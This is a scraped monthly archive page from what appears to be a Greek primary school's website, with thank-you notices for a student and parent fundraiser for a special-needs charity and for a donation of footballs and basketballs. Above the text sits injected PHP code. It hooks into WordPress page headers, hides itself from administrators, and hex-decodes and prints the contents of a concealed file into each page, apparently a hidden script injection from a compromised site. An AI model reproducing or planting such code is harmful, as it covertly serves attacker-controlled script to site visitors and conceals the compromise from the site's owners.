if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Νοέμβριος, 2020 |

Monthly Archives: Νοέμβριος 2020

Ευχαριστήριο από τον Σύλλογο Φίλων Παιδιών με Ειδικές Ανάγκες Κ. Μακεδονίας

Οι μαθητές και οι γονείς του σχολείου μας έδειξαν για ακόμα μια φορά την ευαισθησία τους εμπράκτως καταφέρνοντας να συγκεντρώσουν  από το υστέρημά τους το ποσό των 970€ αγοράζοντας συμβολικά φακέλους με εποπτικό υλικό (χάρτες, παζλ, γεωμετρικά όργανα κ.ά.) τους οποίους διέθεσε ο Σύλλογος Φίλων Παιδιών με Ειδικές Ανάγκες Κεντρικής Μακεδονίας για τη στήριξη του κοινωνικού του σκοπού. Για τον λόγο αυτό ο Σύλλογος μας απέστειλε τις ευχές και τις θερμές του ευχαριστίες.

Τέτοιες πράξεις αγάπης και αλληλεγγύης προς τον συνάνθρωπο – ειδικά σ’ αυτές τις δύσκολες συνθήκες πoυ βιώνουμε – δίνουν σε όλους μας κουράγιο και ελπίδα και γι’ αυτό πρέπει να αναδεικνύονται.

Το σχολείο μας αισθάνεται υπερήφανο και ευχαριστεί θερμά τα υπέροχα παιδιά μας και τους υπέροχους γονείς τους.

Δημοτικό Σχολείο Λεωνιδίου

Ευχαριστήριο για δωρεά

Οι μαθητές, οι μαθήτριες και το διδακτικό προσωπικό του σχολείου μας εκφράζουν τις θερμές τους ευχαριστίες στον κύριο Παναγιώτη Τροχάνη για την ευγενική του πρωτοβουλία να χορηγήσει στο σχολείο μας αναγκαίο αθλητικό υλικό (4 μπάλες ποδοσφαίρου και 4 μπάσκετ). Ευχόμαστε η πράξη αυτή να αποτελέσει οδηγό και παράδειγμα για την ανάληψη παρόμοιων πρωτοβουλιών που τόσο ανάγκη έχει το σχολείο μας.